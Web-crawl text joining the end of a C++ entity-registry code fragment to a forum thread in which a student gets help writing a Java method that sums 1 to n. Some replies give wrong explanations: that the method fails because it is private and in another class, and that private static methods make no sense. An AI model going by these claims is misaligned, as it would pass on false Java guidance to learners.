This document specifies goals, requirements and use cases for the XQuery Update Facility 3.0. It was developed by the W3C XML Query Working Group, which is part of the XML Activity. The Working Group expects to eventually publish this document as a Working Group Note.

This document includes, for each requirement, a corresponding status, indicating the current situation of the requirement in XQuery Update Facility 3.0 at the time that it was issued as a Working Draft in December 2011. Organizations and individuals should review this document to determine whether or not the requirements provided meet the needs of the XML update community. If additional requirements are identified, they may be added to these requirements in a future publication.

Three status levels are used:

Met: This indicates that the requirement, according to its original formulation, has been completely met. Optional clarificatory text may follow.

Partially met: This indicates that the requirement has been partially met according to its original formulation. When this status is indicated, explanatory text is provided to better clarify the current scope of the requirement.

Not met: This indicates that the requirement, according to its original formulation, has not been met. If this is the case, explanatory text is provided.

This document also incorporates a number of Use Cases that assist the Working Groups in determining whether a candidate requirement is, in fact, a real requirement and illustrating various problems that XQuery Update Facility 3.0 is intended to address.

Table of Contents

1 Goals
2 Usage Scenarios
3 Requirements
3.1 Terminology
3.2 General Requirements
3.3 Relationship to XQuery 3.0
3.4 XML Query Update Functionality
3.5 Transaction characteristics
4 Use Cases for XQuery Update Facility 3.0
4.1 Use Case "R" - Updating Relational Data
4.1.1 Description
4.1.2 XML Schemas
4.1.2.1 Schema for users.xml
4.1.2.2 Schema for items.xml
4.1.2.3 Schema for bids.xml
4.1.3 Input Data
4.1.4 Updates and Results
4.1.4.1 Q1
4.1.4.2 Q2
4.1.4.3 Q3
4.2 Use case "Wiki" - traversing a set of Wiki pages
4.2.1 Input data
4.2.2 Q1

1 Goals

This document describes the goals, requirements, and use cases for the XQuery Update Facility 3.0.

2 Usage Scenarios

The following usage scenarios describe how the XQuery Update Facility 3.0 may be used in various environments, and represent a wide range of activities and needs that illustrate the problem space to be addressed. They are intended to be used as design cases during the development of the XQuery Update Facility 3.0, and should be reviewed when critical decisions are made. These usage scenarios should also prove useful in helping non-members of the XML Query Working Group understand the intent and goals of the project.

- Modify XML in persistent XML stores, including native XML databases, XML files stored on a file system, or XML stored in SQL databases.
- Modify XML messages to change status and add information created while processing the message.
- Add new data to an existing XML document; for instance, add a new entry to a BLOG or a data log.
- Perform updates on configuration files, user profiles, or administrative logs represented in XML.
- Create a new copy of an XML document or subtree that differs from the original in the way specified by the update. For instance, updates could be used to modify a web message in order to add new information and change headers to reflect the modified status.
- Modifying XML views of non-XML sources, such as an [SQL/XML] view of a SQL database.
The XQuery Update Facility 3.0 MUST be backwards compatible with [XQuery Update Facility 1.0]. Status: this requirement has not been met.

The XQuery Update Facility 3.0 MUST be defined on the [XQuery and XPath Data Model (XDM) 3.0]. Status: this requirement has not been met.

Note: The properties of a Data Model instance that can be modified by the XQuery Update Facility 3.0 are discussed in 3.4 XML Query Update Functionality.

The XQuery Update Facility 3.0 MUST be based on [XQuery 3.0: An XML Query Language].

The XQuery Update Facility 3.0 MUST use XQuery 3.0 to identify items to be updated.

The XQuery Update Facility 3.0 MUST use XQuery 3.0 to specify items used in the updates. Status: this requirement has not been met.

The XQuery Update Facility 3.0 MAY support an explicit XML Schema validation operation that preserves node identity. Status: this requirement has not been met according to its original formulation; however, the revalidation mode can be set to ensure that type information is recovered and the resulting document is valid according to the governing schema.

Note: The XQuery 3.0 validate expression creates a new copy of each validated node, with a new identity. This requirement involves preservation of identity.

The XQuery Update Facility 3.0 MAY be compositional with respect to XQuery 3.0 expressions; that is, it may be possible to use an update wherever an XQuery 3.0 expression is used. Status: this requirement has not been met. Updating expressions are limited to specific syntactic contexts.

The XQuery Update Facility 3.0 MUST be able to support expressions that return both a non-empty XDM instance and a non-empty pending update list. Status: this requirement has not been met.

In this section, the terms Atomicity, Consistency, Isolation, and Durability are taken from the ACID model of transaction characteristics for databases, which is described in [Transaction Processing Concepts and Techniques].

At the end of an outermost update operation (that is, an update operation invoked from the external environment), the data model MUST be consistent with respect to the constraints specified in the Data Model 3.0. In particular, all type annotations MUST be consistent with the content of the items they govern. Status: this requirement has been met.

The XQuery Update Facility 3.0 MAY define additional levels of granularity at which Data Model 3.0 constraints are enforced. Status: this requirement has not been met.

The XQuery Update Facility 3.0 MUST not preclude the means by which operations can be isolated from concurrent operations. Status: this requirement has not been met.

The XQuery Update Facility 3.0 MUST not preclude a means to control the durability of atomic operations and atomic execution units. Status: this requirement has not been met.

The use cases listed below were created by the XML Query Working Group to illustrate important applications for an XML update facility. Each use case is focused on a specific application area, and contains a Document Type Definition (DTD) and example input data. Each use case specifies a set of updates that might be applied to the input data, and the expected resulting value of the modified input for each update. Since the English description of each query is concise, the expected results form an important part of the definition of each update directive. These use cases are inspired by section 3 Requirements. These use cases represent a snapshot of ongoing work.
Some important application areas and important operations are not yet covered; further use cases for the XQuery Update Facility remain to be created by the XML Query Working Group.

Use Case "R" - Updating Relational Data

One important use of an XML update language will be to update data stored in relational databases. This use case describes a set of such possible updates.

This use case is based on performing updates on the data used in Use Case "R" from the [XML Query Use Cases]. The sample data from this Use Case is copied below for convenience, and exactly matches the data found in the XQuery 1.0 Use Cases. Instead of DTDs, we describe this data with W3C XML Schemas.

Input Data

The following data is an excerpt of the initial state for Q1. In this particular use case, each update begins with the state resulting from the prior update.

<items>
  <item_tuple>
    <itemno>1001</itemno>
    <description>Red Bicycle</description>
    <offered_by>U01</offered_by>
    <start_date>1999-01-05</start_date>
    <end_date>1999-01-20</end_date>
    <reserve_price>40</reserve_price>
  </item_tuple>
  ... Snip ...
</items>

<users>
  <user_tuple>
    <userid>U01</userid>
    <name>Tom Jones</name>
    <rating>B</rating>
  </user_tuple>
  ... Snip ...
</users>

<bids>
  <bid_tuple>
    <userid>U02</userid>
    <itemno>1001</itemno>
    <bid>35</bid>
    <bid_date>1999-01-07</bid_date>
  </bid_tuple>
  <bid_tuple>
  ... Snip ...
</bids>

The entire data set is represented by three tables: USERS, ITEMS, and BIDS.

The underlying database system has the following referential integrity constraints:
- A foreign key on the BIDS table requires that BIDS.USERID contains a value that is found in USERS.USERID
- A foreign key on the BIDS table requires that BIDS.ITEMNO contains a value that is found in ITEMS.ITEMNO

Q1

Insert a new bid for Roger Smith on item 1002, adding 10% to the best bid received so far for this item, and report back what bid was just entered.

Solution in the XQuery Update Facility:

let $uid := doc("users.xml")/users/user_tuple[name = "Roger Smith"]/userid
let $topbid := max(doc("bids.xml")/bids/bid_tuple[itemno = 1002]/bid)
let $newbid := $topbid * 1.1
return (
  insert nodes
    <bid_tuple>
      <userid>{ data($uid) }</userid>
      <itemno>1002</itemno>
      <bid>{ $newbid }</bid>
      <bid_date>1999-03-03</bid_date>
    </bid_tuple>
  into doc("bids.xml")/bids,
  <new_bid>{ $newbid }</new_bid>
)

Expected Result: The best bid for item 1002 had been at 1200, thus Roger's bid is at 1320.

<new_bid>1320</new_bid>

Expected resulting content of bids.xml:

<bids>
  <bid_tuple>
    <userid>U02</userid>
    <itemno>1001</itemno>
    <bid>35</bid>
    <bid_date>1999-01-07</bid_date>
  </bid_tuple>
  ... Snip ...
  <bid_tuple>
    <userid>U01</userid>
    <itemno>1002</itemno>
    <bid>400</bid>
    <bid_date>1999-02-14</bid_date>
  </bid_tuple>
  ... Snip ...
  <bid_tuple>
    <userid>U04</userid>
    <itemno>1007</itemno>
    <bid>225</bid>
    <bid_date>1999-02-12</bid_date>
  </bid_tuple>
  ... Snip ...
  <bid_tuple>
    <userid>U04</userid>
    <itemno>1002</itemno>
    <bid>1320</bid>
    <bid_date>1999-03-03</bid_date>
  </bid_tuple>
</bids>

Q2

Place a bid for Roger Smith on item 1007, adding 10% to the best bid received so far on that item, but only if the bid amount does not exceed a given limit. Otherwise return the current top bid.

Solution in the XQuery Update Facility:

let $uid := doc("users.xml")/users/user_tuple[name = "Roger Smith"]/userid
let $topbid := max(doc("bids.xml")/bids/bid_tuple[itemno = 1007]/bid)
let $newbid := $topbid * 1.1
return
  if ($newbid <= 240) then (
    insert nodes
      <bid_tuple>
        <userid>{ data($uid) }</userid>
        <itemno>1007</itemno>
        <bid>{ $newbid }</bid>
        <bid_date>1999-03-03</bid_date>
      </bid_tuple>
    into doc("bids.xml")/bids,
    <new_bid>{ $newbid }</new_bid>
  ) else (
    <top_bid>{ $topbid }</top_bid>
  )

Expected Result: Adding 10% to the best bid on item 1007 would require a bid of 247.5, which is more than the allowed limit of 240. Thus, the bids.xml document does not change.

<top_bid>225</top_bid>

Q3

Erase user Dee Linquent and the corresponding associated items and bids.
Return a count of the items and bids deleted.

Solution in the XQuery Update Facility:

let $user := doc("users.xml")/users/user_tuple[name = "Dee Linquent"]
let $items := doc("items.xml")/items/item_tuple[offered_by = $user/userid]
let $bids := doc("bids.xml")/bids/bid_tuple[userid = $user/userid]
return (
  delete nodes ($user, $items, $bids),
  <deleted>
    <items>{ count($items) }</items>
    <bids>{ count($bids) }</bids>
  </deleted>
)

Expected Result:

<deleted>
  <items>2</items>
  <bids>2</bids>
</deleted>

Expected resulting content of items.xml:

<items>
  <item_tuple>
    <itemno>1001</itemno>
    <description>Red Bicycle</description>
    <offered_by>U01</offered_by>
    <start_date>1999-01-05</start_date>
    <end_date>1999-01-20</end_date>
    <reserve_price>40</reserve_price>
  </item_tuple>
  ... Snip ...
  <item_tuple>
    <itemno>1004</itemno>
    <description>Tricycle</description>
    <offered_by>U01</offered_by>
    <start_date>1999-02-25</start_date>
    <end_date>1999-03-08</end_date>
    <reserve_price>15</reserve_price>
  </item_tuple>
</items>

Expected resulting content of users.xml:

<users>
  <user_tuple>
    <userid>U01</userid>
    <name>Tom Jones</name>
    <rating>B</rating>
  </user_tuple>
  <user_tuple>
    <userid>U02</userid>
    <name>Mary Doe</name>
    <rating>A</rating>
  </user_tuple>
  <user_tuple>
    <userid>U04</userid>
    <name>Roger Smith</name>
    <rating>C</rating>
  </user_tuple>
  ... Snip ...
  <user_tuple>
    <userid>U06</userid>
    <name>Rip Van Winkle</name>
    <rating>B</rating>
  </user_tuple>
</users>

Expected resulting content of bids.xml:

<bids>
  ... Snip ...
  <bid_tuple>
    <userid>U02</userid>
    <itemno>1002</itemno>
    <bid>600</bid>
    <bid_date>1999-02-16</bid_date>
  </bid_tuple>
  <bid_tuple>
    <userid>U04</userid>
    <itemno>1002</itemno>
    <bid>1000</bid>
    <bid_date>1999-02-25</bid_date>
  </bid_tuple>
  ... Snip ...
  <bid_tuple>
    <userid>U04</userid>
    <itemno>1007</itemno>
    <bid>225</bid>
    <bid_date>1999-02-12</bid_date>
  </bid_tuple>
</bids>

Use case "Wiki" - traversing a set of Wiki pages

This scenario demonstrates the use of an updating function that returns a non-empty XDM instance. The recursive function traverses a set of html documents by following the href attributes, returning an index structure representing the linkage hierarchy. The function also updates a list of visited documents in order to avoid a document being visited more than once.

Note: This use case requires side-effects in the language and so is unlikely to be supported. It may be removed in a future draft of this document.

Input data

Documentation.html: The top level Wiki page.

<html>
  <head><title>Documentation</title></head>
  <body>
    <h1>Contents</h1>
    <ul>
      <li><a href="section1.html">Section 1</a></li>
      <li><a href="section2.html">Section 2</a></li>
    </ul>
  </body>
</html>

section1.html:

<html>
  <head><title>Section 1</title></head>
  <body>
    <h1>First</h1>
    <p>Some interesting detail. More in the <a href="section1a.html">next section</a></p>
    <p>Back to the <a href="Documentation.html">index page</a></p>
  </body>
</html>

section1a.html:

<html>
  <head><title>Section 1a</title></head>
  <body>
    <h1>Subsection</h1>
    <p>More of the same</p>
    <p>Back to the <a href="Documentation.html">index page</a></p>
  </body>
</html>

section2.html:

<html>
  <head><title>Section 2</title></head>
  <body>
    <h1>Second</h1>
    <p>Summary of <a href="section1.html">section 1</a> and <a href="section1a.html">section 1a</a></p>
    <p>Back to the <a href="Documentation.html">index page</a></p>
  </body>
</html>

Q1

Return the document hierarchy omitting duplicates.
Solution in the XQuery Update Facility:

declare variable $prefix := "/html/";
declare variable $visited := <visited/>;

declare function local:filetree($s as xs:string, $depth) {
  if ($depth < 5)
  then
    <level depth="{$depth}">
      <file>{ $s }</file>
      {
        let $relname := concat($prefix, $s)
        let $doc := doc($relname)
        for $href in $doc//@href
        where contains($href, "htm")
          and not(contains($href, "http"))
          and (every $url in $visited/url satisfies $url != $href)
        return (
          insert node <url>{ $href }</url> into $visited,
          <newcall>{ local:filetree($href, $depth + 1) }</newcall>
        )
      }
    </level>
  else ()
};

local:filetree("Documentation.html", 1)

Expected result:

<level depth="1">
  <file> Documentation.html </file>
  <newcall>
    <level depth="2">
      <file> section1.html </file>
      <newcall>
        <level depth="3">
          <file> section1a.html </file>
        </level>
      </newcall>
    </level>
  </newcall>
  <newcall>
    <level depth="2">
      <file> section2.html </file>
    </level>
  </newcall>
</level>
http://www.w3.org/TR/xquery-update-30-requirements-use-cases/
CC-MAIN-2015-06
en
refinedweb
#include <stdio.h>
#include <stdlib.h>
#if defined(WIN32) || defined(__WATCOMC__)
    #include <windows.h>
    #include <conio.h>
    #include <math.h>
#else
    #include "../../api/inc/wincompat.h"
#endif
#include "../../api/inc/fmod.h"
#include "../../api/inc/fmod_errors.h" /* optional */

int main()
{
    double samples[44099];
    FSOUND_SAMPLE *mysample;

    //***************************************************
    for (int i = 0; i < 44100; ++i)
    {
        samples[i] = (10000 * sin(2 * (3.141592) * 880 * (i / 44100.0)));
    }

    mysample = FSOUND_Sample_Alloc(FSOUND_FREE, 44100, FSOUND_NORMAL, 44100, 255, 128, 255);
    FSOUND_Sample_Upload(mysample, samples, FSOUND_NORMAL);
    FSOUND_PlaySound(FSOUND_FREE, mysample);
    //***************************************************

    return 15;
}

This code doesn't work. Why?

- Byte_Junkie asked 13 years ago

You haven't studied the example programs, why? 😆

But seriously, for a start you need to call FSOUND_Init at the start of your program and FSOUND_Close at the end. You can't use double for the type of your sample data; make it signed short if you intended to use 16-bit samples (FSOUND_NORMAL means signed 16-bit data). Finally, your program exits as soon as it's called FSOUND_PlaySound. If you want to hear your sound you'll have to wait for it to play by calling Sleep() or something after FSOUND_PlaySound.

- Andrew Scott answered 13 years ago
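For reference, a minimal sketch applying those fixes (FMOD 3.x API as used above; untested, and the mixer settings are assumptions). Note that the original buffer was also declared one element too small for the 44100 samples written into it:

#include <math.h>
#include <windows.h>                 /* for Sleep() on Windows */
#include "../../api/inc/fmod.h"

int main()
{
    /* FSOUND_NORMAL is signed 16-bit data, so the buffer must be short,
       and it needs all 44100 elements (not 44099). */
    static short samples[44100];

    if (!FSOUND_Init(44100, 32, 0))  /* initialize FMOD before any other call */
        return 1;

    for (int i = 0; i < 44100; ++i)
        samples[i] = (short)(10000 * sin(2 * 3.141592 * 880 * (i / 44100.0)));

    FSOUND_SAMPLE *mysample = FSOUND_Sample_Alloc(FSOUND_FREE, 44100,
        FSOUND_NORMAL, 44100, 255, 128, 255);
    FSOUND_Sample_Upload(mysample, samples, FSOUND_NORMAL);
    FSOUND_PlaySound(FSOUND_FREE, mysample);

    Sleep(1500);                     /* let the one-second tone finish playing */

    FSOUND_Sample_Free(mysample);
    FSOUND_Close();
    return 0;
}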
http://www.fmod.org/questions/question/forum-7126/
CC-MAIN-2016-50
en
refinedweb
Clearance is now a Rails engine…BLAOW!

Why

Clearance has served us well for many months. Our only complaints were shared by others:

- lots of includes
- too much generated code
- too many tests to maintain
- sometimes awkward to override functionality

With the re-institution of Rails engines in Rails 2.3, we decided to convert Clearance to an engine. The process was relatively painless, the code is far cleaner, and we think we were able to scratch all our itches.

Philosophy

Overriding

To override Clearance's default behavior (a sketch of these steps follows the list):

- Write your tests for whatever action you want to add or override.
- Subclass one of Clearance's controllers (Users, Sessions, Passwords, and Confirmations).
- Update your routes (by default, the routes will point to the namespaced Clearance controllers).

The Royal Library of Alexandria

All knowledge pertaining to Clearance can be found on its GitHub wiki, where you'll find such articles as:

- Upgrading to Rails engine
- Organization of modules, routes, & flashes
- Extending Clearance with usernames, admins, or invite codes

…and much more. Enjoy!
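Concretely, the overriding pattern might look something like this. This is a sketch only: the controller and route names are illustrative, and Rails 2.3-era routing syntax is assumed, so check the wiki for the exact names Clearance defines.

# Subclass the namespaced controller, add behavior, fall through to Clearance.
class SessionsController < Clearance::SessionsController
  def create
    # custom behavior here (logging, extra checks, etc.), then defer upward
    super
  end
end

# config/routes.rb (Rails 2.3 syntax), pointing the resource at your subclass:
ActionController::Routing::Routes.draw do |map|
  map.resources :sessions, :controller => 'sessions'
end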
https://robots.thoughtbot.com/clearance-is-a-rails-engine
CC-MAIN-2016-50
en
refinedweb
Hi All,

First time asking so go easy :-) I've been doing C++ for a few weeks now, and I'm working through the questions on Project Euler to hopefully improve my coding. But as you'll probably see below, I'm still very new and "naive"...

Question is: The prime factors of 13195 are 5, 7, 13 and 29. What is the largest prime factor of the number 600851475143?

My issue: I am trying to get 5 as the first prime number by putting this in (if((digit > 5) && (digit%5) != 0)) but it's not working. Can anyone assist? Or am I maybe writing this whole code the wrong way, as in, should I use a different method, different loops, etc.?

Below is my code so far:

#include <iostream>
using namespace std;

int main() {
    long long int number = 600851475143LL;
    long long int biggestPrime = 1;

    for (long long int digit = 1; digit <= number; ++digit) {
        if ((digit % 2) != 0 && (digit % 3) != 0) {
            if ((digit > 5) && (digit % 5) != 0) {
                if ((number % digit) == 0) {
                    if (digit > biggestPrime) {
                        biggestPrime = digit;
                        cout << digit << endl;
                    }
                }
            }
        }
    }

    cout << "Finished";
    int dummy;
    cin >> dummy;
    return 0;
}

Any assistance would be greatly appreciated.....

Edited 5 Years Ago by Narue: n/a
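No answer appears in this excerpt of the thread, so the following is not from the thread; it is just one common approach to this Project Euler problem. The trick is to divide each factor out of the number as soon as it is found, so that only primes can ever divide what remains, and no separate primality test is needed:

#include <iostream>

int main() {
    long long n = 600851475143LL;
    long long largest = 1;

    // Trial division: once every factor d below the current d has been
    // divided out, no composite number can divide the remaining n.
    for (long long d = 2; d * d <= n; ++d) {
        while (n % d == 0) {
            largest = d;
            n /= d;
        }
    }
    if (n > 1) largest = n;  // whatever is left over is itself prime

    std::cout << largest << '\n';
    return 0;
}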
https://www.daniweb.com/programming/software-development/threads/379255/c-prime-number-program-issue
CC-MAIN-2016-50
en
refinedweb
Odoo Help

This community is for beginners and experts willing to share their Odoo knowledge. It's not a forum to discuss ideas, but a knowledge base of questions and their answers.

Questions tagged "netherlands" (1 post, by activity date):

- "import bankstatement amro netherlands abn", by Jeroen Hermans • 3/16/15, 8:10 AM • 2,599 views • 1 answer
https://www.odoo.com/forum/help-1/tag/netherlands-3615/questions
CC-MAIN-2016-50
en
refinedweb
Comments on "Let's Wreck This Together...with Oracle Application Express!: You shouldn't use Oracle Application Express because..." (Joel R. Kallman's blog)

Morten Braten: "Everything else is put in the naming conventions of packages and functions. Again very ugly." Well, "ugly" is in the eye of the beholder. For example, the Win32 API is full of "ugliness" with strange conventions, inconsistent naming and general spaghetti, yet people manage to use it (either because they have to, or because it offers some other benefits). Trust me, there are worse conventions than having to name your items after the page they belong to! And to me, Objective-C looks really ugly; its OO features don't tempt me, because I mostly work with data-driven applications, where PL/SQL's (non-OO) features are much more useful. Here are some of my thoughts on structuring PL/SQL code, in general and for use with Apex: [links elided] With regard to Apex as a tool, the fact that you can create apps like the JSON-powered experiment you described speaks to the strength and flexibility of Apex to make it whatever you need. So I say, leverage PL/SQL packages for data processing, and pick from Apex what you need in terms of authentication and authorization, session management, navigation and templates, Interactive Reports, Flash charts, auto DML (for those quick CRUD apps), and so on. - Morten

ʯɲʑɩʛʯɖʋɪʉ ɕɑʒʝɪɪʧʠʘɶ: Hello Morten and thanks for your comment. We can do what we want, but it's becoming very tricky. [...] We should probably split the application into more and more packages; that way we would have fewer problems with multiple developers, but again the split is not easy to do when your Apex application has dynamic dependencies on these packages. PL/SQL has 3-level namespaces (schema.package.function), and we would like to keep the app code in one schema, so we're down to two levels. Everything else is put in the naming conventions of packages and functions. Again very ugly. [...] Maybe we could use something like Google's Closure to do proper JS (with all the nice features of a modern language) and let the db do what it does best, running its PL/SQL, with APEX acting as a thin (but highly configurable) layer in the middle... [...] As Joel said, they are not targeting this kind of developer; a move in such a direction might not make much sense from a cost/benefit perspective.

Morten Braten: Hi "Guy with strange Unicode name", [...]? Do you have any concrete examples of what type of complexity we are talking about here? I've worked on several business-critical applications written in PL/SQL, with up to 200,000 lines of code, and I've never had problems organizing the code using packages. (I've often found myself wishing that Oracle allowed object names with more than 30 characters, but you work your way around it.) [...] - Morten

Sohil Bhavsar: I love APEX. You can do a lot of things with APEX. It is very much scalable. There are some tips and tricks which will be helpful for developing APEX applications, and which you can master by experience and by reading blogs from APEX experts. Regards, Sohil Bhavsar.

ʯɲʑɩʛʯɖʋɪʉ ɕɑʒʝɪɪʧʠʘɶ: Thanks for your answer. Could you please shed some [...]?

Joel R. Kallman: Hi ʯɲʑɩʛʯɖʋɪʉ ɕɑʒʝɪɪʧʠʘɶ, thanks for your comment. [...] If object-oriented programming fits your need, then you're correct: Application Express is probably not for you. And that's fine; it really isn't intended to be a solution for all problems. [...] Thanks again for your feedback, though. I truly appreciate the perspective. - Joel

Lev: Hello Joel, I agree that APEX is an excellent tool and I think that it can go far beyond basic CRUD, and it does scale in complexity, because there is less complexity. But as any other tool it has its weak points, and in my opinion the biggest is the lack of source control. Unfortunately the current statement of direction is not promising: there is nothing about it. The biggest APEX application is APEX itself. Could you share how the Oracle team manages its source code? Probably we are just missing something and there are efficient ways to manage the code. Thanks, Lev

Unknown: This comment has been removed by the author.

Joel R. Kallman: Flavio, APEX 4.0.2 will ship with XE. - Joel

ʯɲʑɩʛʯɖʋɪʉ ɕɑʒʝɪɪʧʠʘɶ: Joel, we have invested in APEX for the past [...]. In my opinion APEX does have its niche, where it performs better than the competition (rapid development, ...), but our biggest problem is that it doesn't scale in COMPLEXITY. The reason for this is that it doesn't use, right at its core, basic "object oriented" concepts that have proved successful over the past 20 years in designing complex applications: encapsulation, reuse, inheritance, ... [...] Thanks for your time.

Byte64 (Flavio): Joel, which version of Apex are you going to ship with XE 11g? Flavio
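For readers outside the thread, the "naming conventions instead of namespaces" complaint refers to patterns like the following. This is an illustration only, not code from the discussion, and the names are made up:

-- PL/SQL offers only schema.package.subprogram, so larger Apex shops
-- often encode the missing "module" level in the package name itself:
create or replace package app_orders_api as
  procedure place_order(p_customer_id in number, p_item_id in number);
end app_orders_api;
/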
http://joelkallman.blogspot.com/feeds/1833295658799464217/comments/default
CC-MAIN-2016-50
en
refinedweb
11-08-2010 08:00 PM Has anyone had any luck in setting the font of a control to a different color? The "Label" control has an attribute "format" of type TextFormat that has a "color" attribute, but setting it does not seem to do anything. Same with size.

11-09-2010 02:45 PM Yeah, I had to fiddle with it a bit to figure out the hierarchy of all the classes... but here's a snippet that should work for you.

import qnx.ui.text.Label;
import flash.text.TextFormat;
import flash.text.TextFormatAlign;

/* A label in which to show the hello greeting. */
var helloLabel:Label = new Label();
helloLabel.width = 800;
helloLabel.height = 30;
helloLabel.x = (stage.stageWidth - helloLabel.width) / 2;
helloLabel.y = 60;

var txtFormat:TextFormat = new TextFormat();
txtFormat.align = TextFormatAlign.CENTER;
txtFormat.font = "Arial";
txtFormat.color = 0x103f10;
txtFormat.size = 24;
helloLabel.format = txtFormat;

addChild(helloLabel);

Regards, Brent. If I submitted something helpful, please give me a kudo. Thanks.

11-09-2010 02:51 PM Ah, no direct manipulation of the object. Counterintuitive. BB: I suggest the documentation be updated to reflect the issue (or better yet, allow direct manipulation to cut down on the lines of code).

11-09-2010 03:04 PM That's the way ActionScript handles everything, so I doubt they would change it and make it inconsistent.

11-09-2010 03:19 PM Yes, it seems strange that the QNX Label, which seems to support:

helloLabel.format.align = TextFormatAlign.CENTER;
helloLabel.format.font = "Arial";
helloLabel.format.color = 0x103f10;
helloLabel.format.size = 24;

wouldn't work in this fashion. But I do notice that it doesn't have nearly the same class as the spark.components.Label or the old mx.components.Label (which wouldn't allow you to do the above anyway, as they don't support the .format methods). I had thought the qnx.* classes were meant to be completely portable between Spark and QNX (except for the import), but it doesn't appear that they are. Regards, Brent. If my post was found to be helpful to you, please thank me with a kudo. Thanks.

11-09-2010 03:30 PM ActionScript as a language does not prevent direct manipulation of an object; the implementation of the class defines the behavior. In this case, if Label.format was not allocated (assumed), then allocating a TextFormat and setting it to format is required. If Label allocated format in its construction, then direct manipulation of the format's attributes would be possible. Not the end of the world, you just have to be aware of it. This is similar to adding columns to a DataGrid: you cannot just push a new column to a DataGrid, you have to create your own array of columns, add them, and then set the DataGrid's columns to this new array.

11-09-2010 03:39 PM To be in violent agreement with you, at least you can manipulate MX styles individually, for example:

var label : Label = new Label();
label.setStyle( 'fontSize', 12 );

etc. Now, I was never a big fan of meta-driven style manipulation, since it requires the developer to know the style names by heart (or look them up in the documentation) instead of having the IDE (FB4) prompt you as you type. I like that the QNX Label has the format attribute; it's just unfortunate that you cannot change one of its attributes without having to instantiate the whole format class. Again, not the end of the world. I'll just extend it to get the behavior I am looking for.

11-09-2010 03:55 PM Yeah, I would have thought that when you instantiated a Label class into its own object, you'd also end up with an "internal" TextFormat object, but I guess they are trying to save space. Of course the benefit of instantiating your own TextFormat class is that you can use that one instance for many different objects (Label 1, Label 2, Text 1, Text 2, etc.).

11-09-2010 07:44 PM I ran into the label formatting problems earlier today. One way you can assign the formatting of a label is like this:

var label:Label = new Label();
label.format = new TextFormat(null, null, "0xFFFFFF");

You're using the regular AS3 TextFormat class, which has a constructor signature that looks like this:

TextFormat(font:String = null, size:Object = null, color:Object = null, bold:Object = null, italic:Object = null, underline:Object = null, url:String = null, target:String = null, align:String = null, leftMargin:Object = null, rightMargin:Object = null, indent:Object = null, leading:Object = null)

So in my example I'm keeping the default font and size, I'm just overriding the color to make it white.
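Building on the point above about sharing one TextFormat instance across controls, a minimal sketch (the label variables here are made up for illustration):

// Create the TextFormat once and reuse it across several controls.
var sharedFormat:TextFormat = new TextFormat("Arial", 18, 0xFFFFFF);
titleLabel.format  = sharedFormat;
statusLabel.format = sharedFormat;
footerLabel.format = sharedFormat;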
http://supportforums.blackberry.com/t5/Adobe-AIR-Development/CheckBox-and-other-controls-label-font-color-change/td-p/632344
CC-MAIN-2014-10
en
refinedweb
06 November 2008 07:30 [Source: ICIS news] SINGAPORE (ICIS news)--Jatropha would be commercially viable as the next major feedstock for biofuel production in two to three years, with plantations of the non-edible crop beginning to proliferate in southeast Asia and China, an industry consultant said.

"Many people are moving into the field, so there are more and more plantations that are happening in Indonesia, India, the Philippines, Malaysia and China," Temasek Life Science Laboratory director Hong Yan told ICIS news on the sidelines of the "Biofuels and Food Security" forum in Singapore.

"Research on jatropha is currently in its infancy, but the potential is obviously there," Hong said.

Jatropha is a plant that produces seed with up to 40% oil content. Unlike palm, jatropha can grow on degraded soil, as it is resistant to pests and to harsh environmental conditions such as drought.

"Oil palm (plantations are limited to a) much narrower geographic area, particular requirements for soil and involves use of agro-chemicals. Jatropha has fewer requirements and is not limited by geography or soil," he added, although he conceded that the crop could not fully replace the popular biofuel feedstock.

Temasek Life Science is currently in talks with big names in the biofuel industry about a possible commercial venture, Hong said, but he declined to elaborate.

The forum, organized in conjunction with the International Energy Week, runs from 3-7 November.
http://www.icis.com/Articles/2008/11/06/9169356/jatropha-biofuel-viable-in-2-3-years-consultant.html
CC-MAIN-2014-10
en
refinedweb
* Tam? | Is this good practice? It sounds good to me, at least. | It seems that my parser knows something about namespace... Nothing wrong with that, you just have to keep the different layers of the different specs separate in your mind (and parser :). | What will happen to XML 1.0 when the namespace specification becomes | a W3C recommendation? Good question. I don't really know. A reasonable guess would be that the SGML DTD syntax is ditched in favour of an XML-based syntax that is namespace-aware. Or that both are retained. Of course, this means that XML will have two different schema languages, only one of them SGML-compatible. But, like I say, this is just a guess. --Lars M.
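(An illustration, not from the original mail, of why the SGML DTD syntax is not namespace-aware: a DTD treats a qualified name as one literal string, prefix included, so two documents that are identical as far as namespaces are concerned need different DTD declarations.)

<!-- Both root elements are {http://example.org/ns}doc to a
     namespace-aware parser, but a DTD must declare "x:doc" and
     "y:doc" as distinct element types, and must also declare the
     xmlns:* attributes explicitly. -->
<x:doc xmlns:x="http://example.org/ns"/>
<y:doc xmlns:y="http://example.org/ns"/>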
https://mail.python.org/pipermail/xml-sig/1998-November/000518.html
CC-MAIN-2014-10
en
refinedweb
iNumReg Struct Reference

This interface is used for ID -> iCelEntity* registers in the physical layer.

#include <physicallayer/numreg.h>

Detailed Description

This interface is used for ID -> iCelEntity* registers in the physical layer. Currently, two implementations are available:

- cel.numreg.lists (using arrays). This version is more efficient if you don't care which IDs are used and all IDs will be contiguous. This is usually the case for a server or a single app.
- cel.numreg.hash (using hashes). This version is more efficient if you want to allow any kind of ID. This is usually the case for client apps.

You can choose between these two implementations with the iCelPlLayer::ChangeNumReg function.

Definition at line 41 of file numreg.h.

Member Function Documentation

- Removes all objects from the registry.
- Returns the object with ID id from the list.
- Returns the size of the buffer (this is NOT the count of objects in the registry). It is the size of the array if you use the array implementation, and the size of the hash otherwise.
- Registers an object in the registry and returns the new ID; in case of error, ID 0 is returned.
- Registers an object in the registry with the provided ID. You should call this function only if you are sure the ID isn't allocated yet. It is also advised to use the hash implementation, for memory reasons.
- Removes a registered object from the registry (note: this is slow, whichever implementation you choose).
- Removes a registered object from the registry.

The documentation for this struct was generated from the following file: physicallayer/numreg.h

Generated for CEL: Crystal Entity Layer 2.0 by doxygen 1.6.1
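To illustrate the trade-off between the two implementations, here is a generic sketch. This is not CEL source and the method names are made up; CEL's actual signatures live in physicallayer/numreg.h:

// Generic sketch of the two registry strategies described above.
#include <cstddef>
#include <unordered_map>
#include <vector>

struct iCelEntity;  // opaque here

// "lists" style: the register hands out contiguous IDs, and lookup is a
// plain array index, which suits a server that doesn't care about IDs.
class ArrayRegistry {
  std::vector<iCelEntity*> slots;
public:
  std::size_t Register(iCelEntity* e) {
    slots.push_back(e);
    return slots.size();              // IDs start at 1; 0 is reserved for errors
  }
  iCelEntity* Get(std::size_t id) const {
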